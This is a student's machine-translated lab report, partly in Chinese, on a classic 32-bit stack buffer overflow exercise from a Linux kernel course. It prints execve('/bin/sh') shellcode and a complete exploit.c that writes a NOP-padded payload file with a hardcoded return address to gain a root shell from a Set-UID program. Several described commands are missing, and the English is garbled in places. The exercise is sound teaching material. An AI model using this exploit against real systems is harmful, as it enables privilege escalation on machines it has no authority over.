20199323 "Linux kernel principle and Analysis" in the twelfth week job

I. Introduction experiment

Buffer overflow refers to circumstances beyond the pre-allocated program attempts to write data to a fixed-length buffer. This vulnerability can be used by malicious users to change the flow of the control program, even any fragment of code execution. The emergence of this vulnerability is due to the temporary closure of the data buffer and the return address, the overflow will cause the return address is overwritten.

Second, the experimental preparation

The system user name shiyanlou
laboratory building offers a 64-bit Ubuntu linux, but this experiment is difficult to see assembly statements, we need to operate in 32-bit environments testimony, and therefore need to do some preparation before the experiment.
Input command to install some packages 32 C to compile the program:

• sudo apt-get update

• sudo apt-get install -y lib32z1 libc6-dev-i386

• sudo apt-get install -y lib32readline-gplv2-dev

  Third, the experimental procedures

  3.1 Initial Set
  1, Ubuntu and other Linux systems, the use of address space randomization and initial address to a random heap stack (stack) of (heap), which makes guessing the exact address of the memory becomes very difficult, but speculation is memory address the key buffer overflow attacks. Therefore, in this experiment, we use the following command to turn off this feature:
  
  2, in addition, to further guard against buffer overflow attacks and other attacks using the shell program, many shell program automatically give up their privileges when invoked. So, even if you can cheat a Set-UID program calls a shell, can not remain in this shell with root privileges, this protective measures implemented in the / bin / bash in.

linux system, / bin / sh is actually a symbolic link to / bin / bash or / bin / dash of. In order to recreate the conditions before the protective measures are implemented, we use another shell program (zsh) instead of / bin / bash. The following instructions describe how to set zsh program:


3.2 the shellcode
Generally, buffer overflow will cause the program to crash, in the program, data coverage overflow return address. If overwrite the return address data is another address, then the program will jump to the address if the address is stored for a well-designed code used to implement other functions, this code is shellcode.

Observe the following code:

#include <stdio.h>
int main()
{
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
}

The shellcode experiment is just compiled version of the code:
\ x31 \ XC0 \ X50 \ X68 "SH //" \ X68 "/ bin" \ X89 \ XE3 \ X50 \ X53 \ X89 \ xe1 \ x99 \ XB0 \ X0B \ XCD \ X80
3.3 vulnerability program


can know by the code, the program will read a "badfile" file name and file contents into the "buffer".
Compile the program and set the SET-UID. Command is as follows:

3.4 exploit
our aim is just to attack the vulnerable program and obtain root privileges by an attacker.

Exploit.c create a new file in the / tmp directory, enter the following:

/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[] =
    "\x31\xc0" //xorl %eax,%eax
    "\x50"     //pushl %eax
    "\x68""//sh" //pushl $0x68732f2f
    "\x68""/bin"     //pushl $0x6e69622f
    "\x89\xe3" //movl %esp,%ebx
    "\x50"     //pushl %eax
    "\x53"     //pushl %ebx
    "\x89\xe1" //movl %esp,%ecx
    "\x99"     //cdq
    "\xb0\x0b" //movb $0x0b,%al
    "\xcd\x80" //int $0x80
    ;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");   //在buffer特定偏移处起始的四个字节覆盖sellcode地址  
    strcpy(buffer + 100, shellcode);   //将shellcode拷贝至buffer，偏移量设为了 100

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}

Note that the above code, \ x ?? \ x ?? \ x ?? \ x ?? address the need to add shellcode stored in memory, because this position is just overwriting the return address overflow occurs. The strcpy (buffer + 100, shellcode); this one also tells us, shellcode stored in the position buffer + 100. Here we will describe in detail how to get the address we need to add.

Now we have to get shellcode address in memory, enter the command:

• gdb stack

• disass main

接下来的操作：

按 q 键，再按 enter 键可退出调试。
现在修改exploit.c文件！将 \x??\x??\x??\x?? 修改为 \x84\xd4\xff\xff

然后，编译 exploit.c 程序：

• gcc -m32 -o exploit exploit.c
  3.5 攻击结果
  先运行攻击程序 exploit，再运行漏洞程序 stack，观察结果：
  
  可见，通过攻击，获得了root 权限！

四、练习

1、按照实验步骤进行操作，攻击漏洞程序并获得 root 权限。

2、通过命令 sudo sysctl -w kernel.randomize_va_space=2 打开系统的地址空间随机化机制，重复用 exploit 程序攻击 stack 程序，观察能否攻击成功，能否获得root权限。

失败